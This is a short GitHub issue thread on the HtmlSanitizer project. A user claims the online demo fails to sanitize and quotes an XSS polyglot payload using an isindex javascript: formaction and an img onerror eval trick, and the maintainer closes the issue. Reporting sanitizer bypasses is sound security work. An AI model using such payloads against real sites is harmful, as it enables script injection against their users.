### ISSUE TITLE
Failing to Sanitize

### ISSUE THREAD

**Issue by bhillebsco** [mganss/HtmlSanitizer#120]
Failing to Sanitize through online demo!

'">>"> @gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> "> <img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'">

**Comment by bhillebsco** [comment]
![bug](https://cloud.githubusercontent.com/assets/26626018/26631864/cbbb929e-45d2-11e7-9527-7a969e32aa5d.JPG)

**Comment by mganss** [comment]
Closing
